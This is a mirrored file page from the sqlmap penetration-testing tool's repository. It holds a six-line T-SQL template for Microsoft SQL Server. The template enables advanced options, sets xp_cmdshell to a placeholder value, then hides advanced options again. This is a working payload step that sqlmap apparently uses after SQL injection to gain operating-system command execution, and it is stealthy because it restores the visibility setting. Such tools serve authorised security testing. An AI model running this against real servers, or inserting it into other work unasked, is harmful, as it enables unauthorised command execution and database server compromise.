mirror of
https://github.com/sqlmapproject/sqlmap
synced 2025-12-09 18:02:56 +01:00
6 lines
No EOL
231 B
Text
6 lines
No EOL
231 B
Text
EXEC master..sp_configure 'show advanced options', 1;
|
|
RECONFIGURE WITH OVERRIDE;
|
|
EXEC master..sp_configure 'xp_cmdshell', %ENABLE%;
|
|
RECONFIGURE WITH OVERRIDE;
|
|
EXEC sp_configure 'show advanced options', 0;
|
|
RECONFIGURE WITH OVERRIDE; |